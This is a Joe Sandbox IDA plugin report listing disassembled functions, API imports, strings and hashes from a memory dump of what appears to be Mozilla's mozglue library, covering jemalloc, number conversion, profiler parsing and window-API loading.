Snapshot File: hcaresult_0_2_6cb80000_file.jbxd

Similarity

API ID: CriticalSection$Leave$Enter$K@1@Maybe@_RandomUint64@mozilla@@$CountInitializeSpin
String ID: : (malloc) Error initializing arena$<jemalloc>
API String ID: 2690322072-3894294050
Opcode ID: f1392e95af9fabf84952fd0a9c9758c6f030d770e5b272c0bd030eb902c5157d
Instruction ID: fd127d665c9b4a9d3dd528f12f210e7f7e55af93c9a11a06da823b5c905bf14a
Opcode Fuzzy Hash: f1392e95af9fabf84952fd0a9c9758c6f030d770e5b272c0bd030eb902c5157d
Instruction Fuzzy Hash: 8891B271B087818FD718CF78D09076AB7F1EB99314F154A2EE9EA87A81D731E845CB42

Function 6CBA5E90 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 2651COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(-0000000C), ref: 6CBA5EDB
memset.VCRUNTIME140(6CBE7765,000000E5,55CCCCCC), ref: 6CBA5F27
LeaveCriticalSection.KERNEL32(?), ref: 6CBA5FB2
memset.VCRUNTIME140(6CBE7765,000000E5,C0C09015), ref: 6CBA61F0
VirtualFree.KERNEL32(-00000001,00100000,00004000), ref: 6CBA7652

Strings

MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x20U)) == 0) (Freeing in decommitted page.), xrefs: 6CBA72E3
MOZ_CRASH(), xrefs: 6CBA7BA4
MOZ_RELEASE_ASSERT(mNode), xrefs: 6CBA7BCD, 6CBA7C1F, 6CBA7C34, 6CBA80FD
MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x01U)) != 0) (Double-free?), xrefs: 6CBA72F8
MOZ_RELEASE_ASSERT((run->mRegionsMask[elm] & (1U << bit)) == 0) (Double-free?), xrefs: 6CBA730D

Memory Dump Source

Source File: 00000000.00000002.1689033198.000000006CB81000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB80000, based on PE: true

Associated: 00000000.00000002.1689014684.000000006CB80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689084512.000000006CBFD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689106840.000000006CC0E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689125183.000000006CC12000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb80000_file.jbxd

Similarity

API ID: CriticalSectionmemset$EnterFreeLeaveVirtual
String ID: MOZ_CRASH()$MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x01U)) != 0) (Double-free?)$MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x20U)) == 0) (Freeing in decommitted page.)$MOZ_RELEASE_ASSERT((run->mRegionsMask[elm] & (1U << bit)) == 0) (Double-free?)$MOZ_RELEASE_ASSERT(mNode)
API String ID: 2613674957-1127040744
Opcode ID: f8ab6b052073a5430fb7ecd6c8728a3378146bf9cc88ab7aa53f198d9edbfec0
Instruction ID: dde1fe63a512fd057f28deb5a96da8bd36916860ad05952252edcbf833742b4f
Opcode Fuzzy Hash: f8ab6b052073a5430fb7ecd6c8728a3378146bf9cc88ab7aa53f198d9edbfec0
Instruction Fuzzy Hash: E2337CB16097418FC308CF6DC590615BBE2FF85328F29C6ADE4A98B7A5D771E842CB41

Function 6CBE4EA0 Relevance: 16.2, APIs: 8, Strings: 1, Instructions: 408sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000007D0), ref: 6CBE4EFF
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CBE4F2E
moz_xmalloc.MOZGLUE ref: 6CBE4F52
memset.VCRUNTIME140(00000000,00000000), ref: 6CBE4F62
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CBE52B2
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CBE52E6
Sleep.KERNEL32(00000010), ref: 6CBE5481
free.MOZGLUE(?), ref: 6CBE5498

Strings

(, xrefs: 6CBE5250

Memory Dump Source

Source File: 00000000.00000002.1689033198.000000006CB81000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB80000, based on PE: true

Associated: 00000000.00000002.1689014684.000000006CB80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689084512.000000006CBFD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689106840.000000006CC0E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689125183.000000006CC12000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb80000_file.jbxd

Similarity

API ID: floor$Sleep$freememsetmoz_xmalloc
String ID: (
API String ID: 4104871533-3887548279
Opcode ID: 949bfee591d46a918b1edc2ce3508956ad84f38c006d47b31a9b07629e786e00
Instruction ID: 989b946e60961c76f007ccae9cd88bb8b9f5bf49bdc048f2da66e35f3d6f175a
Opcode Fuzzy Hash: 949bfee591d46a918b1edc2ce3508956ad84f38c006d47b31a9b07629e786e00
Instruction Fuzzy Hash: 53F1B271A18B408FC716CF39C85062BB7F5AFD6384F068B2EF856A7651DB31D8468B81

Function 6CBA9E50 Relevance: 13.1, APIs: 6, Strings: 1, Instructions: 878COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 6CBA9EB8
LeaveCriticalSection.KERNEL32(?), ref: 6CBA9F24
memset.VCRUNTIME140(00000000,00000000,?), ref: 6CBA9F34
LeaveCriticalSection.KERNEL32(?), ref: 6CBAA823
?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6CBAA83C
?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6CBAA849

Strings

MOZ_RELEASE_ASSERT(mNode), xrefs: 6CBAA8B1, 6CBAA8D4, 6CBAA8EF

Memory Dump Source

Source File: 00000000.00000002.1689033198.000000006CB81000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB80000, based on PE: true

Associated: 00000000.00000002.1689014684.000000006CB80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689084512.000000006CBFD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689106840.000000006CC0E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689125183.000000006CC12000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb80000_file.jbxd

Similarity

API ID: CriticalSection$K@1@LeaveMaybe@_RandomUint64@mozilla@@$Entermemset
String ID: MOZ_RELEASE_ASSERT(mNode)
API String ID: 2950001534-1351931279
Opcode ID: 2b57a411f32df1771a8e40f1764917140d554d9057a5385cf862fcbed4cdda31
Instruction ID: 3da62a6276605cc03a3a1428471548a6f32badc8e45630146b533b46089efdfc
Opcode Fuzzy Hash: 2b57a411f32df1771a8e40f1764917140d554d9057a5385cf862fcbed4cdda31
Instruction Fuzzy Hash: 4A728A72A097518FD318CF68C440215FBE1FF89728B29C66DE8A99B791D335E842CF91

Function 6CBD2C10 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 228stringCOMMON

Download Yara Rule

APIs

?EcmaScriptConverter@DoubleToStringConverter@double_conversion@@SAABV12@XZ.MOZGLUE ref: 6CBD2C31
?ToShortestIeeeNumber@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@W4DtoaMode@12@@Z.MOZGLUE ref: 6CBD2C61

Part of subcall function 6CB84DE0: ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6CB84E5A
Part of subcall function 6CB84DE0: ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6CB84E97

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6CBD2C82
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6CBD2E2D

Part of subcall function 6CB981B0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,00000000,?,ProfileBuffer parse error: %s,expected a ProfilerOverheadDuration entry after ProfilerOverheadTime), ref: 6CB981DE

Strings

ProfileBuffer parse error: %s, xrefs: 6CBD2E3B
(root), xrefs: 6CBD354F
expected a Time entry, xrefs: 6CBD2E36

Memory Dump Source

Source File: 00000000.00000002.1689033198.000000006CB81000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB80000, based on PE: true

Associated: 00000000.00000002.1689014684.000000006CB80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689084512.000000006CBFD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689106840.000000006CC0E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689125183.000000006CC12000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb80000_file.jbxd

Similarity

API ID: String$Double$Converter@double_conversion@@$Dtoa$Ascii@Builder@2@Builder@2@@Converter@CreateDecimalEcmaIeeeMode@12@Mode@12@@Number@Representation@ScriptShortestV12@__acrt_iob_func__stdio_common_vfprintfstrlen
String ID: (root)$ProfileBuffer parse error: %s$expected a Time entry
API String ID: 801438305-4149320968
Opcode ID: 03736e0b07554f4b519d68710e3286deddaacdf8849e315b14d85043bf1fc954
Instruction ID: ec8206cfa8f1b860185246a2b4652f57fbd12b69da4edcf056a308fec956215a
Opcode Fuzzy Hash: 03736e0b07554f4b519d68710e3286deddaacdf8849e315b14d85043bf1fc954
Instruction Fuzzy Hash: 6891AD706087C18FD724CF24C49469EB7F1EF89258F114A2DE99A8B751EB30E94ACB53

Function 6CBE9E30 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 347COMMON

Download Yara Rule

APIs

__aullrem.LIBCMT ref: 6CBE9F3D
__aulldiv.LIBCMT ref: 6CBE9F77
__aullrem.LIBCMT ref: 6CBE9F8C
__aulldiv.LIBCMT ref: 6CBEA023

Strings

NaN, xrefs: 6CBE9EAB
-Infinity, xrefs: 6CBE9E60, 6CBE9E7B

Memory Dump Source

Source File: 00000000.00000002.1689033198.000000006CB81000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB80000, based on PE: true

Associated: 00000000.00000002.1689014684.000000006CB80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689084512.000000006CBFD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689106840.000000006CC0E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689125183.000000006CC12000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb80000_file.jbxd

Similarity

API ID: __aulldiv__aullrem
String ID: -Infinity$NaN
API String ID: 3839614884-2141177498
Opcode ID: b7bfebf2334727045b6f3378f866695f9c85fec5f9af995618f3c3a157ac851b
Instruction ID: f1683aa7cf12749510f56b38e556424eedb37ca4db6029be44dd874bcfc681b0
Opcode Fuzzy Hash: b7bfebf2334727045b6f3378f866695f9c85fec5f9af995618f3c3a157ac851b
Instruction Fuzzy Hash: 59C1A131E043988BDF14CFA8C8507EEBBBAEF89B54F144529D405ABB80D771A949CF91

Function 6CB8D4E0 Relevance: 10.8, Strings: 8, Instructions: 805COMMON

Download Yara Rule

Strings

, xrefs: 6CB8DA88
9, xrefs: 6CB8DE7F
8, xrefs: 6CB8DC08
1, xrefs: 6CB8DBDD
-, xrefs: 6CB8D7DD
0, xrefs: 6CB8DC7F
@, xrefs: 6CB8DAF6
0, xrefs: 6CB8D852

Memory Dump Source

Source File: 00000000.00000002.1689033198.000000006CB81000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB80000, based on PE: true

Associated: 00000000.00000002.1689014684.000000006CB80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689084512.000000006CBFD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689106840.000000006CC0E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689125183.000000006CC12000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb80000_file.jbxd

Similarity

API ID:
String ID: $-$0$0$1$8$9$@
API String ID: 0-3654031807
Opcode ID: a1cb079d63fd644bb7ab67c0d78cc5ead0c693e98341e70b270f03ddc44f6b12
Instruction ID: c9672c852c44a2b98d2eb42802c5a960338e723f0f59bb6d51907b7b01c39a1e
Opcode Fuzzy Hash: a1cb079d63fd644bb7ab67c0d78cc5ead0c693e98341e70b270f03ddc44f6b12
Instruction Fuzzy Hash: 0F629E7150E3C68FDB05CE29E09075ABBE2EF86358F584A1FE8D54BA91C3359885CB43

Function 6CB8BEF0 Relevance: 8.2, APIs: 5, Instructions: 652COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 6CB8C1CB
__aulldiv.LIBCMT ref: 6CB8C24C
__aulldiv.LIBCMT ref: 6CB8C348
__aullrem.LIBCMT ref: 6CB8C365
__aulldiv.LIBCMT ref: 6CB8C37D

Memory Dump Source

Source File: 00000000.00000002.1689033198.000000006CB81000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB80000, based on PE: true

Associated: 00000000.00000002.1689014684.000000006CB80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689084512.000000006CBFD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689106840.000000006CC0E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689125183.000000006CC12000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb80000_file.jbxd

Similarity

API ID: __aulldiv$__aullrem
String ID:
API String ID: 2022606265-0
Opcode ID: f56df46d33552dd8100cae53d24ae323fb4832d86786e5cbb4b774b0e277ade9
Instruction ID: 3c6583e69181ffe47df6ebd184a7ff948fec5707425c9fad50cdb9d33f7824d1
Opcode Fuzzy Hash: f56df46d33552dd8100cae53d24ae323fb4832d86786e5cbb4b774b0e277ade9
Instruction Fuzzy Hash: 83322472B056418FC718DE2CC890A6ABBE6AFC9350F09876DE499CB395D730ED05CB91

Function 6CBF545C Relevance: 6.6, APIs: 5, Instructions: 305COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,000000FF,?), ref: 6CBF8A4B

Memory Dump Source

Source File: 00000000.00000002.1689033198.000000006CB81000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB80000, based on PE: true

Associated: 00000000.00000002.1689014684.000000006CB80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689084512.000000006CBFD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689106840.000000006CC0E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689125183.000000006CC12000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb80000_file.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
Instruction ID: e3e7aa4a364093ccb82efef733b40b69227106633533778acda5af856f8acc82
Opcode Fuzzy Hash: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
Instruction Fuzzy Hash: 23B1D672E0025A8FDB24CF68CC9079DB7B2EF95314F1802A9C599DB791D730998ECB91

Function 6CBF542B Relevance: 6.5, APIs: 5, Instructions: 287COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,000000FF,?), ref: 6CBF88F0
memset.VCRUNTIME140(?,000000FF,?,?), ref: 6CBF925C

Memory Dump Source

Source File: 00000000.00000002.1689033198.000000006CB81000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB80000, based on PE: true

Associated: 00000000.00000002.1689014684.000000006CB80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689084512.000000006CBFD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689106840.000000006CC0E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689125183.000000006CC12000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb80000_file.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
Instruction ID: a6be792341fd86bdf5cda2ea8c901947277052613bc39f2909fb1e5ffd1526bf
Opcode Fuzzy Hash: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
Instruction Fuzzy Hash: E8B1C572E0014A8FDB24CE58CC816EDB7B2EF95314F144269C959EB785D731A98ECB90

Function 6CBC6CF0 Relevance: 4.7, APIs: 3, Instructions: 231COMMON

Download Yara Rule

APIs

InitializeConditionVariable.KERNEL32(?), ref: 6CBC6D45
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CBC6E1E

Memory Dump Source

Source File: 00000000.00000002.1689033198.000000006CB81000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB80000, based on PE: true

Associated: 00000000.00000002.1689014684.000000006CB80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689084512.000000006CBFD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689106840.000000006CC0E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689125183.000000006CC12000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb80000_file.jbxd

Similarity

API ID: ConditionExclusiveInitializeLockReleaseVariable
String ID:
API String ID: 4169067295-0
Opcode ID: 699fd373ec0c68ae49618433447ae899a72cd90065b884084cc0e1138ba0868e
Instruction ID: 18d6d50375f4bc8d4bd3d9305655fc8d4cedde26fe438b2aeef75fe432bdea5b
Opcode Fuzzy Hash: 699fd373ec0c68ae49618433447ae899a72cd90065b884084cc0e1138ba0868e
Instruction Fuzzy Hash: EEA179746183818FDB14CF24C490BAEBBF2BF89308F45491DE88A97751DB70A849CB93

Function 6CBE85F0 Relevance: 3.6, APIs: 2, Instructions: 619COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 6CBE8C7C
__aulldiv.LIBCMT ref: 6CBE8DD7

Memory Dump Source

Source File: 00000000.00000002.1689033198.000000006CB81000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB80000, based on PE: true

Associated: 00000000.00000002.1689014684.000000006CB80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689084512.000000006CBFD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689106840.000000006CC0E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689125183.000000006CC12000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb80000_file.jbxd

Similarity

API ID: __aulldiv
String ID:
API String ID: 3732870572-0
Opcode ID: db5f37eeb5151a0c79d842b80d44bf315513e08190c289969ce06011ea5de0b8
Instruction ID: 764d61d898c35a662606ab617d898fec11f598a57dc89ea173d6042a13d4d42f
Opcode Fuzzy Hash: db5f37eeb5151a0c79d842b80d44bf315513e08190c289969ce06011ea5de0b8
Instruction Fuzzy Hash: C2327B31F006598FDF18CE9CC8A17AEB7B2FB88740F15852AD40ABB790DB359D458B91

Function 6CBC5C10 Relevance: 1.6, APIs: 1, Instructions: 333COMMON

Download Yara Rule

APIs

memcmp.VCRUNTIME140(?,?,6CB94A63,?,?), ref: 6CBC5F06

Memory Dump Source

Source File: 00000000.00000002.1689033198.000000006CB81000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB80000, based on PE: true

Associated: 00000000.00000002.1689014684.000000006CB80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689084512.000000006CBFD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689106840.000000006CC0E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689125183.000000006CC12000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb80000_file.jbxd

Similarity

API ID: memcmp
String ID:
API String ID: 1475443563-0
Opcode ID: ed58eae63c6a09f33a6194d3394033994b12804d32b63c4fc25c0e5a9d596634
Instruction ID: febe498bc11ffd227a97dc7dfa59520dd54c61ae055ed44e6ad9bc18ddf42bbe
Opcode Fuzzy Hash: ed58eae63c6a09f33a6194d3394033994b12804d32b63c4fc25c0e5a9d596634
Instruction Fuzzy Hash: 6BC1D275E012998BCF04CF94C5906EEBBF2FF89318F28415DD8556BB40D732A80ACB96

Function 6CBF76E3 Relevance: .5, Instructions: 540COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1689033198.000000006CB81000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB80000, based on PE: true

Associated: 00000000.00000002.1689014684.000000006CB80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689084512.000000006CBFD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689106840.000000006CC0E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689125183.000000006CC12000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb80000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72fe09860ade046fc3bdcfcdda7f36b59b22c90a724c00f6b1989c1cc893ef4e
Instruction ID: 2fec475ee711bbc385bf45ad0cf3fe7cfef0fee95ff9bb66a8ef21c9eed52b2f
Opcode Fuzzy Hash: 72fe09860ade046fc3bdcfcdda7f36b59b22c90a724c00f6b1989c1cc893ef4e
Instruction Fuzzy Hash: 61321971E006598FCB14CF99C890A9DF7B2FF88304F6481AAC859A7745D771AD8ACF90

Function 6CBF6E63 Relevance: .5, Instructions: 498COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1689033198.000000006CB81000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB80000, based on PE: true

Associated: 00000000.00000002.1689014684.000000006CB80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689084512.000000006CBFD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689106840.000000006CC0E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689125183.000000006CC12000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb80000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a22d295006b0cf76062ece48329bf5a81d073d80eca1d8f36db09750ec8a7875
Instruction ID: 6c8fd6a48fafe1dd8233475b8b932de9a3468442d26ce16fd83e72b8691ace7e
Opcode Fuzzy Hash: a22d295006b0cf76062ece48329bf5a81d073d80eca1d8f36db09750ec8a7875
Instruction Fuzzy Hash: 9B22F871E002598FCB14CF98C880A9DF7F2FF89304F6581A9C959A7745D771A98ACF90

Function 6CBB0512 Relevance: .5, Instructions: 466COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1689033198.000000006CB81000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB80000, based on PE: true

Associated: 00000000.00000002.1689014684.000000006CB80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689084512.000000006CBFD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689106840.000000006CC0E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689125183.000000006CC12000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb80000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 732f8aafec1c0d410ff216b27f2e5c03b4339b09f163d0f101acbef2ddceab04
Instruction ID: 7f960f0acacdd1bff6a14af7b576edf1d3de269422a0e6c8b2da3317cbee8732
Opcode Fuzzy Hash: 732f8aafec1c0d410ff216b27f2e5c03b4339b09f163d0f101acbef2ddceab04
Instruction Fuzzy Hash: 02220671E046598FDB18CF98C990AADF7B2FF88304F588299D44AB7705D731A986CF90

Function 6CBFAC00 Relevance: .4, Instructions: 445COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1689033198.000000006CB81000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB80000, based on PE: true

Associated: 00000000.00000002.1689014684.000000006CB80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689084512.000000006CBFD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689106840.000000006CC0E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689125183.000000006CC12000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb80000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac6f562c1432ece180531e6a4086b21509f4c0a9ff948f90423ef1820e9f770e
Instruction ID: 37f7a06d3333579ed4d781f2ce6aa78f67464662a0d20b7b7490de392ff8dee2
Opcode Fuzzy Hash: ac6f562c1432ece180531e6a4086b21509f4c0a9ff948f90423ef1820e9f770e
Instruction Fuzzy Hash: A7F129716087854FDB04CE28C8907AAB7E6EFC5318F158A2DE4F487791E774984E8B93

Function 6CB8C670 Relevance: .3, Instructions: 285COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1689033198.000000006CB81000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB80000, based on PE: true

Associated: 00000000.00000002.1689014684.000000006CB80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689084512.000000006CBFD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689106840.000000006CC0E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689125183.000000006CC12000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb80000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e0237b6fe6878b5c9d7142c5b0fdb09dfdf9fcc0206538975243e8437b3ed89
Instruction ID: 00410d2e9f4b26936b74d3a5dd01c36209f9c6391b83eb8d7204e1a0dba3e23d
Opcode Fuzzy Hash: 4e0237b6fe6878b5c9d7142c5b0fdb09dfdf9fcc0206538975243e8437b3ed89
Instruction Fuzzy Hash: 07A1AF71F0121A8BDB08CE69C8913AEB7F2EFC8355F188269D915E7785DB349C068BD0

Function 6CBE55F0 Relevance: 77.2, APIs: 22, Strings: 22, Instructions: 163libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(user32,?,6CBBE1A5), ref: 6CBE5606
LoadLibraryW.KERNEL32(gdi32,?,6CBBE1A5), ref: 6CBE560F
GetProcAddress.KERNEL32(00000000,GetThreadDpiAwarenessContext), ref: 6CBE5633
GetProcAddress.KERNEL32(00000000,AreDpiAwarenessContextsEqual), ref: 6CBE563D
GetProcAddress.KERNEL32(00000000,EnableNonClientDpiScaling), ref: 6CBE566C
GetProcAddress.KERNEL32(00000000,GetSystemMetricsForDpi), ref: 6CBE567D
GetProcAddress.KERNEL32(00000000,GetDpiForWindow), ref: 6CBE5696
GetProcAddress.KERNEL32(00000000,RegisterClassW), ref: 6CBE56B2
GetProcAddress.KERNEL32(00000000,CreateWindowExW), ref: 6CBE56CB
GetProcAddress.KERNEL32(00000000,ShowWindow), ref: 6CBE56E4
GetProcAddress.KERNEL32(00000000,SetWindowPos), ref: 6CBE56FD
GetProcAddress.KERNEL32(00000000,GetWindowDC), ref: 6CBE5716
GetProcAddress.KERNEL32(00000000,FillRect), ref: 6CBE572F
GetProcAddress.KERNEL32(00000000,ReleaseDC), ref: 6CBE5748
GetProcAddress.KERNEL32(00000000,LoadIconW), ref: 6CBE5761
GetProcAddress.KERNEL32(00000000,LoadCursorW), ref: 6CBE577A
GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 6CBE5793
GetProcAddress.KERNEL32(00000000,GetMonitorInfoW), ref: 6CBE57A8
GetProcAddress.KERNEL32(00000000,SetWindowLongPtrW), ref: 6CBE57BD
GetProcAddress.KERNEL32(?,StretchDIBits), ref: 6CBE57D5
GetProcAddress.KERNEL32(?,CreateSolidBrush), ref: 6CBE57EA
GetProcAddress.KERNEL32(?,DeleteObject), ref: 6CBE57FF

Strings

SetWindowLongPtrW, xrefs: 6CBE57B7
LoadIconW, xrefs: 6CBE575B
EnableNonClientDpiScaling, xrefs: 6CBE5666
DeleteObject, xrefs: 6CBE57F9
LoadCursorW, xrefs: 6CBE5774
StretchDIBits, xrefs: 6CBE57CC
MonitorFromWindow, xrefs: 6CBE578D
GetWindowDC, xrefs: 6CBE5710
AreDpiAwarenessContextsEqual, xrefs: 6CBE5637
